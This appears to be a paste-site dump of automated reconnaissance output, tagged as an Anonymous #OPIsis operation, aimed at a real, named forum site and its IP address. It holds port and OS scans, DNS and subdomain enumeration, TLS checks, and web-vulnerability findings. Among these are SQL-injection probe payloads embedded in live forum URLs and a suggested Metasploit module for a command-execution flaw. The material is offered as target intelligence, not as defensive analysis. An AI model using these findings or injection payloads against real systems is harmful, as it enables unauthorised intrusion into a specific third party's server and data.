  1747. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1748. |_[ + ] [ 97 / 100 ]-[07:24:13] [ - ]
  1749. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?t=24485 ]
  1750. |_[ + ] Exploit::
  1751. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1752. |_[ + ] More details:: / - / , ISP:
  1753. |_[ + ] Found:: UNIDENTIFIED
  1754.  
  1755. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1756. |_[ + ] [ 98 / 100 ]-[07:24:17] [ - ]
  1757. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?t=93763 ]
  1758. |_[ + ] Exploit::
  1759. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1760. |_[ + ] More details:: / - / , ISP:
  1761. |_[ + ] Found:: UNIDENTIFIED
  1762.  
  1763. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1764. |_[ + ] [ 99 / 100 ]-[07:24:22] [ - ]
  1765. |_[ + ] Target:: [ http://www.alfetn.com/vb3/showthread.php?t=89691 ]
  1766. |_[ + ] Exploit::
  1767. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1768. |_[ + ] More details:: / - / , ISP:
  1769. |_[ + ] Found:: UNIDENTIFIED
  1770.  
  1771. [ INFO ] [ Shutting down ]
  1772. [ INFO ] [ End of process INURLBR at [28-06-2018 07:24:22]
  1773. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
  1774. [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-alfetn.com.txt ]
  1775. #######################################################################################################################################
  1776. + -- --=[Port 110 opened... running tests...
  1777. Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-28 07:24 EDT
  1778. Nmap scan report for alfetn.com (23.94.17.37)
  1779. Host is up (0.45s latency).
  1780. rDNS record for 23.94.17.37: host.colocrossing.com
  1781.  
  1782. PORT STATE SERVICE VERSION
  1783. 110/tcp filtered pop3
  1784. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  1785. Device type: firewall|general purpose
  1786. Running: Linux 2.4.X|2.6.X, ISS embedded
  1787. OS CPE: cpe:/o:linux:linux_kernel:2.4.18 cpe:/h:iss:proventia_gx3002 cpe:/o:linux:linux_kernel:2.6.22
  1788. OS details: ISS Proventia GX3002 firewall (Linux 2.4.18), Linux 2.6.22 (Debian 4.0)
  1789. Network Distance: 1 hop
  1790.  
  1791. TRACEROUTE (using port 443/tcp)
  1792. HOP RTT ADDRESS
  1793. 1 452.70 ms host.colocrossing.com (23.94.17.37)
  1794. #######################################################################################################################################
  1795. ^ ^
  1796. _ __ _ ____ _ __ _ _ ____
  1797. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  1798. | V V // o // _/ | V V // 0 // 0 // _/
  1799. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  1800. <
  1801. ...'
  1802.  
  1803. WAFW00F - Web Application Firewall Detection Tool
  1804.  
  1805. By Sandro Gauci && Wendel G. Henrique
  1806.  
  1807. Checking https://alfetn.com
  1808.  
  1809. + -- --=[Checking if X-Content options are enabled on alfetn.com...
  1810.  
  1811. + -- --=[Checking if X-Frame options are enabled on alfetn.com...
  1812.  
  1813. + -- --=[Checking if X-XSS-Protection header is enabled on alfetn.com...
  1814.  
  1815. + -- --=[Checking HTTP methods on alfetn.com...
  1816.  
  1817. + -- --=[Checking if TRACE method is enabled on alfetn.com...
  1818.  
  1819. + -- --=[Checking for META tags on alfetn.com...
  1820.  
  1821. + -- --=[Checking for open proxy on alfetn.com...
  1822.  
  1823. + -- --=[Enumerating software on alfetn.com...
  1824.  
  1825. + -- --=[Checking if Strict-Transport-Security is enabled on alfetn.com...
  1826.  
  1827. + -- --=[Checking for Flash cross-domain policy on alfetn.com...
  1828.  
  1829. + -- --=[Checking for Silverlight cross-domain policy on alfetn.com...
  1830.  
  1831. + -- --=[Checking for HTML5 cross-origin resource sharing on alfetn.com...
  1832.  
  1833. + -- --=[Retrieving robots.txt on alfetn.com...
  1834.  
  1835. + -- --=[Retrieving sitemap.xml on alfetn.com...
  1836.  
  1837. + -- --=[Checking cookie attributes on alfetn.com...
  1838.  
  1839. + -- --=[Checking for ASP.NET Detailed Errors on alfetn.com...
  1840. #######################################################################################################################################
  1841. AVAILABLE PLUGINS
  1842. -----------------
  1843.  
  1844. PluginChromeSha1Deprecation
  1845. PluginSessionRenegotiation
  1846. PluginSessionResumption
  1847. PluginHSTS
  1848. PluginOpenSSLCipherSuites
  1849. PluginCertInfo
  1850. PluginCompression
  1851. PluginHeartbleed
  1852.  
  1853.  
  1854.  
  1855. CHECKING HOST(S) AVAILABILITY
  1856. -----------------------------
  1857.  
  1858. alfetn.com:443 => 23.94.17.37:443
  1859.  
  1860.  
  1861.  
  1862. SCAN RESULTS FOR ALFETN.COM:443 - 23.94.17.37:443
  1863. -------------------------------------------------
  1864.  
  1865. Unhandled exception when processing --compression:
  1866. _nassl.OpenSSLError -
  1867. error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol
  1868.  
  1869. Unhandled exception when processing --reneg:
  1870. _nassl.OpenSSLError -
  1871. error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol
  1872.  
  1873. * Session Resumption:
  1874. With Session IDs: ERROR (0 successful, 0 failed, 5 errors, 5 total attempts).
  1875. ERROR #1: OpenSSLError -
  1876. error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol
  1877. ERROR #2: OpenSSLError -
  1878. error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol
  1879. ERROR #3: OpenSSLError -
  1880. error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol
  1881. ERROR #4: OpenSSLError -
  1882. error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol
  1883. ERROR #5: OpenSSLError -
  1884. error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol
  1885. With TLS Session Tickets: ERROR: OpenSSLError -
  1886. error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol
  1887.  
  1888. Unhandled exception when processing --certinfo:
  1889. _nassl.OpenSSLError -
  1890. error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol
  1891.  
  1892. * SSLV2 Cipher Suites:
  1893. Undefined - An unexpected error happened:
  1894. RC4-MD5 timeout - timed out
  1895. RC2-CBC-MD5 timeout - timed out
  1896. IDEA-CBC-MD5 timeout - timed out
  1897. EXP-RC4-MD5 timeout - timed out
  1898. EXP-RC2-CBC-MD5 timeout - timed out
  1899. DES-CBC-MD5 timeout - timed out
  1900.  
  1901. * SSLV3 Cipher Suites:
  1902. Undefined - An unexpected error happened:
  1903. SEED-SHA timeout - timed out
  1904. RC4-SHA timeout - timed out
  1905. RC4-MD5 timeout - timed out
  1906. NULL-SHA timeout - timed out
  1907. NULL-MD5 timeout - timed out
  1908. IDEA-CBC-SHA timeout - timed out
  1909. EXP-RC2-CBC-MD5 timeout - timed out
  1910. EXP-EDH-DSS-DES-CBC-SHA timeout - timed out
  1911. EXP-DES-CBC-SHA timeout - timed out
  1912. EXP-ADH-DES-CBC-SHA timeout - timed out
  1913. EDH-RSA-DES-CBC3-SHA timeout - timed out
  1914. EDH-RSA-DES-CBC-SHA timeout - timed out
  1915. EDH-DSS-DES-CBC3-SHA timeout - timed out
  1916. EDH-DSS-DES-CBC-SHA timeout - timed out
  1917. ECDHE-RSA-RC4-SHA timeout - timed out
  1918. ECDHE-RSA-NULL-SHA timeout - timed out
  1919. ECDHE-RSA-DES-CBC3-SHA timeout - timed out
  1920. ECDHE-RSA-AES256-SHA timeout - timed out
  1921. ECDHE-RSA-AES128-SHA timeout - timed out
  1922. ECDHE-ECDSA-RC4-SHA timeout - timed out
  1923. ECDHE-ECDSA-NULL-SHA timeout - timed out
  1924. ECDHE-ECDSA-DES-CBC3-SHA timeout - timed out
  1925. ECDHE-ECDSA-AES128-SHA timeout - timed out
  1926. ECDH-RSA-RC4-SHA timeout - timed out
  1927. ECDH-RSA-NULL-SHA timeout - timed out
  1928. ECDH-RSA-DES-CBC3-SHA timeout - timed out
  1929. ECDH-RSA-AES256-SHA timeout - timed out
  1930. ECDH-RSA-AES128-SHA timeout - timed out
  1931. ECDH-ECDSA-RC4-SHA timeout - timed out
  1932. ECDH-ECDSA-NULL-SHA timeout - timed out
  1933. ECDH-ECDSA-DES-CBC3-SHA timeout - timed out
  1934. ECDH-ECDSA-AES256-SHA timeout - timed out
  1935. ECDH-ECDSA-AES128-SHA timeout - timed out
  1936. DHE-RSA-SEED-SHA timeout - timed out
  1937. DHE-RSA-CAMELLIA256-SHA timeout - timed out
  1938. DHE-RSA-CAMELLIA128-SHA timeout - timed out
  1939. DHE-RSA-AES256-SHA timeout - timed out
  1940. DHE-RSA-AES128-SHA timeout - timed out
  1941. DHE-DSS-SEED-SHA timeout - timed out
  1942. DHE-DSS-CAMELLIA256-SHA timeout - timed out
  1943. DHE-DSS-CAMELLIA128-SHA timeout - timed out
  1944. DHE-DSS-AES256-SHA timeout - timed out
  1945. DHE-DSS-AES128-SHA timeout - timed out
  1946. DH-RSA-DES-CBC3-SHA timeout - timed out
  1947. DH-RSA-DES-CBC-SHA timeout - timed out
  1948. DH-RSA-CAMELLIA256-SHA timeout - timed out
  1949. DH-RSA-CAMELLIA128-SHA timeout - timed out
  1950. DH-RSA-AES256-SHA timeout - timed out
  1951. DH-RSA-AES128-SHA timeout - timed out
  1952. DH-DSS-SEED-SHA timeout - timed out
  1953. DH-DSS-DES-CBC3-SHA timeout - timed out
  1954. DH-DSS-DES-CBC-SHA timeout - timed out
  1955. DH-DSS-CAMELLIA256-SHA timeout - timed out
  1956. DH-DSS-CAMELLIA128-SHA timeout - timed out
  1957. DH-DSS-AES256-SHA timeout - timed out
  1958. DH-DSS-AES128-SHA timeout - timed out
  1959. CAMELLIA256-SHA timeout - timed out
  1960. CAMELLIA128-SHA timeout - timed out
  1961. AES256-SHA timeout - timed out
  1962. AES128-SHA timeout - timed out
  1963. AECDH-RC4-SHA timeout - timed out
  1964. AECDH-DES-CBC3-SHA timeout - timed out
  1965. AECDH-AES256-SHA timeout - timed out
  1966. AECDH-AES128-SHA timeout - timed out
  1967. ADH-SEED-SHA timeout - timed out
  1968. ADH-RC4-MD5 timeout - timed out
  1969. ADH-DES-CBC3-SHA timeout - timed out
  1970. ADH-DES-CBC-SHA timeout - timed out
  1971. ADH-CAMELLIA256-SHA timeout - timed out
  1972. ADH-CAMELLIA128-SHA timeout - timed out
  1973. ADH-AES256-SHA timeout - timed out
  1974. ADH-AES128-SHA timeout - timed out
  1975.  
  1976.  
  1977.  
  1978. SCAN COMPLETED IN 141.06 S
  1979. --------------------------
  1980. Version: 1.11.11-static
  1981. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  1982.  
  1983. Connected to 23.94.17.37
  1984.  
  1985. Testing SSL server alfetn.com on port 443 using SNI name alfetn.com
  1986.  
  1987. TLS Fallback SCSV:
  1988. Server does not support TLS Fallback SCSV
  1989.  
  1990. TLS renegotiation:
  1991. Session renegotiation not supported
  1992.  
  1993. TLS Compression:
  1994. Compression disabled
  1995.  
  1996. Heartbleed:
  1997. TLS 1.2 not vulnerable to heartbleed
  1998. TLS 1.1 not vulnerable to heartbleed
  1999. TLS 1.0 not vulnerable to heartbleed
  2000. #######################################################################################################################################
  2001. I, [2018-06-28T07:29:34.339376 #17096] INFO -- : Initiating port scan
  2002. I, [2018-06-28T07:30:48.826155 #17096] INFO -- : Using nmap scan output file logs/nmap_output_2018-06-28_07-29-34.xml
  2003. I, [2018-06-28T07:30:48.827563 #17096] INFO -- : Discovered open port: 23.94.17.37:80
  2004. I, [2018-06-28T07:30:50.596447 #17096] INFO -- : Discovered open port: 23.94.17.37:443
  2005. I, [2018-06-28T07:30:52.646397 #17096] INFO -- : Discovered open port: 23.94.17.37:465
  2006. I, [2018-06-28T07:30:55.614959 #17096] INFO -- : Discovered open port: 23.94.17.37:993
  2007. I, [2018-06-28T07:30:59.571169 #17096] INFO -- : Discovered open port: 23.94.17.37:995
  2008. I, [2018-06-28T07:31:03.526813 #17096] INFO -- : Discovered open port: 23.94.17.37:8081
  2009. I, [2018-06-28T07:31:05.459317 #17096] INFO -- : <<<Enumerating vulnerable applications>>>
  2010. --------------------------------------------------------
  2011. <<<Yasuo discovered following vulnerable applications>>>
  2012. --------------------------------------------------------
  2013. +-----------------+----------------------------------+------------------------------------------------+----------+----------+
  2014. | App Name | URL to Application | Potential Exploit | Username | Password |
  2015. +-----------------+----------------------------------+------------------------------------------------+----------+----------+
  2016. | Linksys WRT54GL | http://23.94.17.37:80/apply.cgi | ./auxiliary/admin/http/linksys_wrt54gl_exec.rb | | |
  2017. | Linksys WRT54GL | http://23.94.17.37:443/apply.cgi | ./auxiliary/admin/http/linksys_wrt54gl_exec.rb | | |
  2018. +-----------------+----------------------------------+------------------------------------------------+----------+----------+
  2019. #######################################################################################################################################
  2020. [*] Performing General Enumeration of Domain: alfetn.com
  2021. [-] DNSSEC is not configured for alfetn.com
  2022. [*] SOA ns1.alfetn.com 23.94.17.37
  2023. [*] NS ns1.alfetn.com 23.94.17.37
  2024. [*] Bind Version for 23.94.17.37 9.8.2rc1-RedHat-9.8.2-0.62.rc1.el6_9.5
  2025. [*] NS ns2.alfetn.com 172.245.104.110
  2026. [*] Bind Version for 172.245.104.110 9.8.2rc1-RedHat-9.8.2-0.62.rc1.el6_9.5
  2027. [*] MX alfetn.com 23.94.17.37
  2028. [*] A alfetn.com 23.94.17.37
  2029. [*] TXT alfetn.com v=spf1 ip4:23.94.17.37 ip4:192.3.138.116 +a +mx ~all
  2030. [*] Enumerating SRV Records
  2031. [-] No SRV Records Found for alfetn.com
  2032. #######################################################################################################################################
  2033. [*] Processing domain alfetn.com
  2034. [+] Getting nameservers
  2035. 172.245.104.110 - ns2.alfetn.com
  2036. 23.94.17.37 - ns1.alfetn.com
  2037. [-] Zone transfer failed
  2038.  
  2039. [+] TXT records found
  2040. "v=spf1 ip4:23.94.17.37 ip4:192.3.138.116 +a +mx ~all"
  2041.  
  2042. [+] MX records found, added to target list
  2043. 0 alfetn.com.
  2044.  
  2045. [*] Scanning alfetn.com for A records
  2046. 23.94.17.37 - alfetn.com
  2047. 23.94.17.37 - ftp.alfetn.com
  2048. 127.0.0.1 - localhost.alfetn.com
  2049. 23.94.17.37 - mail.alfetn.com
  2050. 23.94.17.37 - ns1.alfetn.com
  2051. 172.245.104.110 - ns2.alfetn.com
  2052. 23.94.17.37 - www.alfetn.com
  2053. #######################################################################################################################################
  2054. Starting Nmap 7.01 ( https://nmap.org ) at 2018-06-28 11:10 UTC
  2055. Nmap scan report for alfetn.com (23.94.17.37)
  2056. Host is up (0.025s latency).
  2057. rDNS record for 23.94.17.37: host.colocrossing.com
  2058. PORT STATE SERVICE VERSION
  2059. 21/tcp open ftp Pure-FTPd
  2060. 22/tcp closed ssh
  2061. 23/tcp closed telnet
  2062. 80/tcp open http nginx
  2063. 110/tcp open pop3 Dovecot pop3d
  2064. 143/tcp open imap Dovecot imapd
  2065. 443/tcp open https?
  2066. 3389/tcp closed ms-wbt-server
  2067. #######################################################################################################################################
  2068. Start: Thu Jun 28 11:11:26 2018
  2069. HOST: whatweb Loss% Snt Last Avg Best Wrst StDev
  2070. 1.|-- 45.55.64.254 0.0% 3 0.3 2.0 0.3 5.0 2.4
  2071. 2.|-- 138.197.251.28 0.0% 3 0.4 0.4 0.3 0.6 0.0
  2072. 3.|-- nyk-b3-link.telia.net 0.0% 3 1.0 8.5 1.0 23.5 12.9
  2073. 4.|-- nyk-bb4-link.telia.net 0.0% 3 1.7 1.7 1.6 1.7 0.0
  2074. 5.|-- buf-b1-link.telia.net 0.0% 3 12.1 12.6 10.9 14.7 1.9
  2075. 6.|-- colocrossing-ic-317200-buf-b1.c.telia.net 0.0% 3 11.0 11.0 10.9 11.0 0.0
  2076. 7.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
  2077. 8.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
  2078. 9.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
  2079. 10.|-- host.colocrossing.com 0.0% 3 11.2 11.2 11.1 11.3 0.0
  2080. 11.|-- host.colocrossing.com 0.0% 3 11.6 11.5 11.5 11.6 0.0
  2081.  
  2082. #######################################################################################################################################
  2083. Ip Address Status Type Domain Name Server
  2084. ---------- ------ ---- ----------- ------
  2085. 23.94.17.37 200 host ftp.alfetn.com nginx admin
  2086. 127.0.0.1 host localhost.alfetn.com
  2087. 23.94.17.37 200 alias mail.alfetn.com nginx admin
  2088. 23.94.17.37 200 host alfetn.com nginx admin
  2089. 23.94.17.37 200 host ns1.alfetn.com nginx admin
  2090. 172.245.104.110 host ns2.alfetn.com
  2091. 23.94.17.37 200 alias www.alfetn.com nginx admin
  2092. 23.94.17.37 200 host alfetn.com nginx admin
  2093. #######################################################################################################################################
  2094. Original* alfetn.com 23.94.17.37 NS:ns1.alfetn.com MX:alfetn.com
  2095. Addition alfetna.com 52.55.168.146 NS:ns1.namebrightdns.com
  2096. Bitsquatting alfatn.com 52.55.168.146 NS:ns1.namebrightdns.com
  2097. Omission alfen.com 83.217.75.59 NS:nsauth1.introweb.nl MX:relay.introweb.nl
  2098. Omission alftn.com 52.55.168.146 NS:ns1.namebrightdns.com
  2099. Omission alfet.com 69.172.201.153 NS:ns1.uniregistrymarket.link
  2100. Replacement alfeth.com 45.35.176.206 NS:ns4.dnsdun.com
  2101. Replacement alfern.com 194.63.248.70 2a01:5b40:0:4070::1 NS:ns1.hyp.net MX:mx.domeneshop.no
  2102. Transposition alfent.com 50.63.202.52 NS:ns43.domaincontrol.com MX:alfent-
  2103. #######################################################################################################################################
  2104. --------------------------------------------------------------------------------------------------------------------------------------
  2105. + Target IP: 23.94.17.37
  2106. + Target Hostname: alfetn.com
  2107. + Target Port: 80
  2108. + Start Time: 2018-06-28 07:14:55 (GMT-4)
  2109. ---------------------------------------------------------------------------------------------------------------------------------------
  2110. + Server: nginx admin
  2111. + The anti-clickjacking X-Frame-Options header is not present.
  2112. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  2113. + Uncommon header 'x-cache' found, with contents: HIT from Backend
  2114. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  2115. + Server leaks inodes via ETags, header found with file /index.htm, fields: 0x4e835fc1 0x9736
  2116. + Cookie _mcnc created without the httponly flag
  2117. + Uncommon header 'x-microcachable' found, with contents: 0
  2118. + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
  2119. + /cgi-sys/guestbook.cgi: May allow attackers to execute commands as the web daemon.
  2120. + /cgi-sys/Count.cgi: This may allow attackers to execute arbitrary commands on the server
  2121. + OSVDB-3233: /mailman/listinfo: Mailman was found on the server.
  2122. + OSVDB-3233: /postinfo.html: Microsoft FrontPage default file found.
  2123. + OSVDB-3092: /cgi-sys/entropysearch.cgi?query=asdfasdf&user=root&basehref=%2F%2Fwww.yourdomain.com/: CPanel's Entropy Search allows username enumeration via the user parameter.
  2124. + OSVDB-3092: /img-sys/: Default image directory should not allow directory listing.
  2125. + OSVDB-3092: /java-sys/: Default Java directory should not allow directory listing.
  2126. + OSVDB-3233: /_vti_inf.html: FrontPage/SharePoint is installed and reveals its version number (check HTML source for more information).
  2127. + 10691 requests: 0 error(s) and 16 item(s) reported on remote host
  2128. + End Time: 2018-06-28 08:48:58 (GMT-4) (5643 seconds)
  2129. ---------------------------------------------------------------------------------------------------------------------------------------
  2130. #######################################################################################################################################
  2131. =======================================================================================================================================
  2132. | Domain: http://alfetn.com/
  2133. | Server: nginx admin
  2134. | IP: 23.94.17.37
  2135. =======================================================================================================================================
  2136. |
  2137. | Directory check:
  2138. =======================================================================================================================================
  2139. |
  2140. | File check:
  2141. | [+] CODE: 200 URL: http://alfetn.com/favicon.ico
  2142. | [+] CODE: 200 URL: http://alfetn.com/index.htm
  2143. | [+] CODE: 200 URL: http://alfetn.com/mailman/listinfo
  2144. | [+] CODE: 200 URL: http://alfetn.com/postinfo.html
  2145. | [+] CODE: 200 URL: http://alfetn.com/_vti_inf.html
  2146. =======================================================================================================================================
  2147.  
  2148. | File Upload Forms:
  2149. |
  2150. | FCKeditor File Upload:
  2151. |
  2152. | E-mails:
  2153. | [+] E-mail Found: myname@domain.com
  2154. | [+] E-mail Found: mailman@alfetn.com
  2155. | [+] E-mail Found: j.doe@example.com
  2156. |
  2157. | External hosts:
  2158. | [+] External Host Found: http://www.gnu.org
  2159. | [+] External Host Found: http://www.almobshrat.com
  2160. | [+] External Host Found: http://www.sbeelalislam.net
  2161. | [+] External Host Found: http://api.recaptcha.net
  2162. |
  2163. | PHPinfo() Disclosure:
  2164. |
  2165. | Timthumb:
  2166. |
  2167. | Ignored Files:
  2168. | http://alfetn.com/vb3/clientscript/vbulletin_read_marker.js?v=382
  2169. | http://alfetn.com/vb3/clientscript/vbulletin_thrdpostlist.js?v=382
  2170. | http://alfetn.com/vb3/clientscript/vbulletin_md5.js?v=382
  2171. | http://alfetn.com/vb3/clientscript/vbulletin_lightbox.js?v=382
  2172. | http://alfetn.com/vb3/clientscript/vbulletin_global.js?v=382
  2173. | http://alfetn.com/vb3/clientscript/vbulletin_ajax_reputation.js?v=382
  2174. | http://alfetn.com/vb3/clientscript/vbulletin_menu.js?v=382
  2175. | http://alfetn.com/vb3/clientscript/vbulletin_important.css?v=382
  2176. | http://alfetn.com/vb3/clientscript/yui/connection/connection-min.js?v=382
  2177. | http://alfetn.com/vb3/clientscript/vbulletin_post_loader.js?v=382
  2178. | http://alfetn.com/vb3/clientscript/yui/yahoo-dom-event/yahoo-dom-event.js?v=382
  2179. ======================================================================================================================================
  2180. | Backup Files:
  2181. |
  2182. |
  2183. | Blind SQL Injection:
  2184. | [+] Vul [Blind SQL-i]: http://alfetn.com/vb3/index.php?s=27aa64c1908958e8ee981653c0f85d79'+AND+'1'='1
  2185. Wide character in print at /usr/share/uniscan/Uniscan/Functions.pm line 159.
  2186. Wide character in print at /usr/share/uniscan/Uniscan/Functions.pm line 161.
  2187. | [+] Keyword: والزوار
  2188. Wide character in print at /usr/share/uniscan/Uniscan/Functions.pm line 496.
  2189. | [+] Vul [Blind SQL-i]: http://alfetn.com/vb3/misc.php?do=whoposted&t=91131'+AND+'1'='1
  2190. Wide character in print at /usr/share/uniscan/Uniscan/Functions.pm line 159.
  2191. Wide character in print at /usr/share/uniscan/Uniscan/Functions.pm line 161.
  2192. | [+] Keyword: السياف
  2193. Wide character in print at /usr/share/uniscan/Uniscan/Functions.pm line 496.
  2194. | [+] Vul [Blind SQL-i]: http://alfetn.com/vb3/forumdisplay.php?f=41&daysprune=-1&sort=title&order=asc+AND+1=1
  2195. Wide character in print at /usr/share/uniscan/Uniscan/Functions.pm line 159.
  2196. Wide character in print at /usr/share/uniscan/Uniscan/Functions.pm line 161.
  2197. | [+] Keyword: وبركاته
  2198. Wide character in print at /usr/share/uniscan/Uniscan/Functions.pm line 496.
  2199. ####################################################################################################################################### Anonymous JTSEC #OPIsis Full Recon #8
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement